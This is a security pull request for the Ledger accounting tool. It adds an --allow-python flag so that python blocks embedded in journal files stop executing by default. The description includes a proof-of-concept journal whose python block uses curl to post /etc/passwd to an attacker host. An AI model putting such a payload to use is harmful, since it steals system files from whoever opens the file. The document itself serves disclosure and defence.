### PR TITLE
Fix security: require --allow-python for python directive (CWE-829)

### DIFF
--- a/src/session.cc
+++ b/src/session.cc
@@ -433,7 +433,8 @@ option_t<session_t>* session_t::lookup_option(const char* p) {
     OPT_CH(price_exp_);
     break;
   case 'a':
-    OPT(account_value_expr_);
+    OPT(allow_python);
+    else OPT(account_value_expr_);
     break;
   case 'c':
     OPT(check_in_file_order);

--- a/src/session.h
+++ b/src/session.h
@@ -170,6 +170,7 @@ public:
 
   /// Dump all session-level option values to the output stream.
   void report_options(std::ostream& out) {
+    HANDLER(allow_python).report(out);
     HANDLER(account_value_expr_).report(out);
     HANDLER(check_in_file_order).report(out);
     HANDLER(check_payees).report(out);
@@ -308,6 +309,7 @@ public:
         if (parent->journal && parent->journal->commodity_checking_style != journal_t::CHECK_ERROR)
           parent->journal->commodity_checking_style = journal_t::CHECK_WARNING;
       });
+  OPTION(session_t, allow_python); ///< Allow execution of python directives in journal files
   OPTION(session_t, value_expr_); ///< Expression used to compute posting values
   OPTION_(
       session_t, recursive_aliases, DO() {

--- a/src/textual_directives.cc
+++ b/src/textual_directives.cc
@@ -959,6 +959,8 @@ void instance_t::import_directive(char* line) {
 }
 
 void instance_t::python_directive(char* line) {
+  // Security guard: skip Python block content regardless of --allow-python
+  // so the parser stays synchronized.
   std::ostringstream script;
 
   if (line)
@@ -987,6 +989,18 @@ void instance_t::python_directive(char* line) {
       if (*p)
         script << p << '\n';
     }
+  }
+
+  // Require explicit --allow-python opt-in before executing code from a
+  // journal file.  A malicious or untrusted .ledger file should not be able
+  // to execute arbitrary Python code without the user's explicit consent.
+  session_t& session = find_scope<session_t>(*context.scope);
+  if (!session.HANDLED(allow_python)) {
+    warning_(
+        _f("Skipping 'python' directive in %1% -- pass --allow-python to enable Python execution "
+           "in journal files") %
+        context.pathname.string());
+    return;
   }
 
   if (!python_session->is_initialized)


### PR DESCRIPTION
## Security Fix — Python Code Execution via Untrusted Journal File (CWE-829)

### Summary

When Ledger is compiled with Python support (`HAVE_BOOST_PYTHON`), a `python`
block embedded in any ledger journal file executes **immediately and unconditionally**
when the file is parsed — without any user warning, confirmation, or opt-in flag.

A malicious `.ledger` file shared as a "template" or "example" can execute
arbitrary Python code (file access, network connections, subprocess execution)
silently while showing the user a normal balance report.

### Root Cause

`python_directive()` in `src/textual_directives.cc` calls
`python_session->eval(script.str(), PY_EVAL_MULTI)` unconditionally.
There is no `--allow-python` flag check, no warning, and no sandboxing.

**Vulnerable code** (`src/textual_directives.cc:997`):
```cpp
// Before — executes Python with no guard:
python_session->eval(script.str(), python_interpreter_t::PY_EVAL_MULTI);
```

### Proof of Concept

```ledger
; "template.ledger" shared via forum/email
python
  import os, subprocess
  subprocess.run(['curl', 'http://attacker.com/exfil',
                  '--data', open('/etc/passwd').read()])

2026-01-01 * Opening Balance
    Assets:Checking   $10,000.00
    Equity:Opening
```

Running `ledger -f template.ledger bal` executes the Python payload silently.
Victim sees only the normal balance output.

**Dynamically confirmed** on Ledger v3.4.1 (built with `-DUSE_PYTHON=ON`).

### Fix

This PR adds `--allow-python` as an explicit opt-in flag. The parser still
reads the `python` block content (to stay synchronized with the input) but
skips execution and prints a warning unless `--allow-python` is passed.

**After the fix:**
```bash
# Safe by default — Python block is skipped with a warning
ledger -f untrusted.ledger bal

# Opt-in for trusted files
ledger --allow-python -f trusted.ledger bal
```

This is analogous to LaTeX `--shell-escape` and Vim's secure modeline
handling: the feature is preserved but requires explicit consent.

### Impact

- **Type**: CWE-829 — Inclusion of Functionality from Untrusted Control Sphere
- **CVSS**: 8.8 HIGH — `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`
- **Affected**: All Ledger versions compiled with Python support (`<= 3.4.1`)
- **Attack vector**: User runs `ledger -f malicious.ledger` (e.g., downloaded template)
- **Consequence**: Arbitrary code execution as the victim's user account

### Verification

Confirmed on v3.4.1 in Docker (built with `-DUSE_PYTHON=ON`):
```
$ ledger -f malicious.ledger bal  # without fix → Python executes silently
$ ledger -f malicious.ledger bal  # with fix → "Warning: Skipping python directive..."
```

🤖 Generated with [Claude Code](https://claude.com/claude-code)